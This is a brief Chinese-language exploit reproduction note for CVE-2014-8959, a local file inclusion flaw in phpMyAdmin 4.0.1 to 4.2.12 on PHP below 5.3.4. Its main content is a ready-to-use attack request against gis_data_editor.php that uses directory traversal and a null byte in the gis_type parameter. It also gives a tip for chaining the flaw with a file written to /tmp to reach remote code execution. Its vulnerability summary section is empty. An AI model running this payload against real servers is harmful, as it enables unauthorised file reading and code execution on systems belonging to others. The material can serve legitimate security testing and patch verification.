跳转至

(CVE-2014 -8959)Phpmyadmin 本地文件包含漏洞

一、漏洞简介

二、漏洞影响

phpMyAdmin 4 .0.1--4 .2.12PHP version \< 5.3.4

三、复现过程

/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&amp;gis_data[gis_type]=
/../../../../phpinfo.txt%00    # 注意改下token值

在实际利用中可以利用写入文件到 /tmp 目录下结合此漏洞完成 RCE,php 版本可以通过 http header、

导出表内容到文件的附加内容看到。